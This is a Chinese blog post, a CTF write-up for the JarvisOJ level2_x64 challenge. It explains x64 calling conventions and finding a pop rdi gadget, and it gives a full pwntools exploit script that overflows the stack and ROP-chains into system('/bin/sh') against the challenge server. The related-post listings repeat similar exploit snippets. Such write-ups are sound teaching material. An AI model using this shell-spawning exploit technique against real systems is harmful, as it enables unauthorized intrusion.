JarvisOJ level2x64

最新推荐文章于 2023-07-11 21:11:16 发布
最新推荐文章于 2023-07-11 21:11:16 发布
阅读量458 收藏 7
点赞数 2
文章标签: pwn 栈溢出 ROP x64
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/95185274
版权

这题和level2的漏洞和处理方式差不多,只不过level2是x86而这题是x64的

前言:

首先,我们先看一下x64和x86的区别:

linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。
——引自于蒸米大神的一步一步学ROP
蒸米大神解释的十分通透,对于这一题,我们知道system函数只有一个参数,也就是说,这个参数应该是保存在RDI中,而不会保存到栈上面,不然的话就是第7个参数了,但是我们在进行栈溢出的时候,并不能直接写到寄存器中去。这里,我们就必须用到一些其他的方法。

使用gadget控制RDI等寄存器

所谓gadget,通俗来讲就是程序中的一些小指令,因为我们在一个程序中,不一定能找到刚好符合我们想法一大段的指令(就像system函数和/bin/sh不会每次都以system(’/bin/sh’)出现给你直接使用),我们就只能找一些零碎的片段,再组合起来慢慢使用。
关于寻找gadget的方法,建议看蒸米大神的《一步一步学ROP之linux_x64篇》
在这里,我就使用其中的一种方法寻找gadget。

拿到题目,首先我们还是查看一下保护:
在这里插入图片描述
程序只开启了NX保护,这里和level2差不多。
打开IDA,我们看一下程序的逻辑:
在这里插入图片描述
我们可以看到在vul()函数中有一个read函数存在栈溢出漏洞。
看了一下,程序基本和level2相似,我们就直接构造payload,因为这里使x64的程序,所以我们构造payload应该这样:
在这里插入图片描述
我们使用pop_ret将我们写到栈中的参数放到RDI中(大佬们称此为平衡栈帧)。
接下来我们只要找到一个pop rdi;ret 就可以了。
这里,我们使用ROPgadget寻找这个指令片段:
在这里插入图片描述
程序中正好有我们想要的pop rdi ; ret 片段,我们直接利用起来构造payload就行了。完整的exp如下:

#!/usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com',9882)
p.recvuntil('Input:')
system_addr=0x04004c0
pop_addr=0x04006b3
sh_addr=0x0600a90
payload='a'*0x80+'a'*8+p64(pop_addr)+p64(sh_addr)+p64(system_addr)+'a'*8
p.sendline(payload)
p.interactive()

运行结果如下:
在这里插入图片描述

PLpa、
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jarvislevel2_x64--64位简单栈溢出
qq_43613144的博客
07-26 408
ROPgadget 查找可存储寄存器的代码 ROPgadget --binary level_x64(名字) --only 'pop|ret' | grep 'eax' 查找字符串 ROPgadget --binary rop --string "/bin/sh" 查找有int 0x80的地址 ROPgadget --binary rop --only 'int' ...
jarvisoj_level2_x64
、moddemod
06-17 513
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * context(log_level = 'debug') proc_name = './level2_x64' p =process(proc_name) p = remote('node3.buuoj.cn', 25838) elf = ELF(proc_name) system_addr = elf.sym['system'] bin_sh_str = 0x600a90 pop..
python_x64_v3.8.3.zip
07-07
Python 3.8.3 中的重要变化 __future__ 模块中的 future 旗标常量值已获得更新以防止与 compiler 旗标相冲突。 在之前版本中 PyCF_ALLOW_TOP_LEVEL_AWAIT 与 CO_FUTURE_DIVISION 存在冲突。
jarvis oj---level2x64
weixin_45427676的博客
09-29 285
题目来源 nc pwn2.jarvisoj.com 9882 level2_x64.04d700633c6dc26afc6a1e7e9df8c94e 解题 x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86...
buuctf jarvisoj_level2_x64
carol2358的博客
04-22 379
水题 栈溢出,system和binsh都可以用gdb找到 exp: from pwn import * from LibcSearcher import * local_file = './level2_x64' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.so.6' s...
jarvis oj level2_x64
发蝴蝶和大脑斧的博客
12-05 487
接下来做64位了,首先看下和32位有什么不一样。这篇文章的第3节说的很详细 主要来说就是: 1.内存地址的范围由32位变成了64位,但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。 2.x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。我们要修改寄存器的值就得通过找到例如pop rdi;ret这样...
BUU刷题-Pwn-jarvisoj_level2_x64
一个啥也不会的小菜鸡!
07-11 154
使用栈溢出字符串表中有“/bin/sh”,call_system调用函数,传参rdi。
BUUCTF jarvisoj_level2_x64
小白垃圾笔记2
05-12 237
因为有栈对齐所以需要ret,因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做题笔记,不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。
BUUCTF pwn——jarvisoj_level2_x64
CNS-Enterprise BCC-1701-J
04-03 211
BUUCTF 做题练习
level2 逐笔还原数据统计
08-09
从看盘软件中采集Level2的逐笔还原数据,对出现的成交单按金额大小进行分档统计。适用于开通了THS Level2功能的及喜欢研究资金流向的用户。具体使用及环境要求可见压缩包中的操作说明文件。
深交所level2行情数据接口规范V1.11
11-21
深圳证券交易所行情数据接口规范最新版,包含level2 step格式的完整说明。2021.8版 高频交易或量化涨停板交易必备。
上交所level2产品说明书
12-14
上海证券交易所 Level-2 产品说明书
Link level performance comparison between LTE V2X and DSRC
01-20
Applications of VANETs (Vehicular Ad hoc Networks) have their own requirements and challenges in wireless communication technology.... We conduct link level simulations of LTE V2X and DSRC (Dedicat
上交所Level-2行情接口说明书
12-14
上海证券交易所LDDS 系统 Level-2 行情接口说明书,2020版。 文档介绍了 LDDS 系统中 Level-2 行情数据的接入方式,详细说明了 Level 2 实时数据的数据格式,以方便信息商接收 Level-2 行情数据。 适用于信息商及...
jarvisoj——[XMAN]]level2(x64)
王嘟嘟的博客
07-19 336
题目 Wp 这里检查一下基础项 这里看了一下,发现还是read这里出现了问题,需要进行覆盖 构造一下payload from pwn import * r=process("./level2_x64") #r=remote('pwn2.jarvisoj.com',9882) e=ELF('./level2_x64') sys_addr=e.symbols['system'] bin_addr=e.search("/bin/sh").next() pop_rdi=0x4006b3 payload='
【BUUCTF】jarvisoj_level2_x64 Write Up
古月浪子的博客
08-06 584
漏洞函数里面可以看到,我们可以栈溢出 题目使用了system函数,我们可以直接调用 程序里面藏了一个binsh 接下来只需要构造rop链了 64位的函数调用的第一个参数由rdi寄存器传递,很显然需要用到pop rdi这个gadget,并且几乎每个64位程序里面都能找到它 再需要注意的就是,system调用的时候需要栈对齐,这里采用一个ret来对齐栈 from pwn import * from LibcSearcher import * from struct import pack context..
jarvis oj level2-x64
CNXBDSa的博客
07-27 360
栈溢出大佬总结详情 好了说说做这题的过程 思路和个人见解吧 首先明白32位和64之间的传参的差距 32位通过栈来进行传参 64位是通过寄存器来传参 -----函数参数的传递方式发生了改变,x86(32位)中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。 第一步我们还是checksec查看...
jarvisoj_level2
最新发布
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这个题目的解题思路的说明。 具体来说,在这个题目中,程序调用了system函数,并且存在/bin/sh字符串。通过对return address进行覆盖,可以将程序的控制流引导到system函数,并将/bin/sh字符串作为参数传递给它,从而获取Shell。其中,payload中的一些关键地址和字符串的具体值需要根据具体题目的情况来确定。 需要注意的是,这个题目的具体实现可能与上述引用中的代码有所不同,因此需要根据实际情况进行调整。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [jarvisoj_level2_x64](https://blog.csdn.net/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [jarvisoj_level2](https://blog.csdn.net/m0_55086916/article/details/128089924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值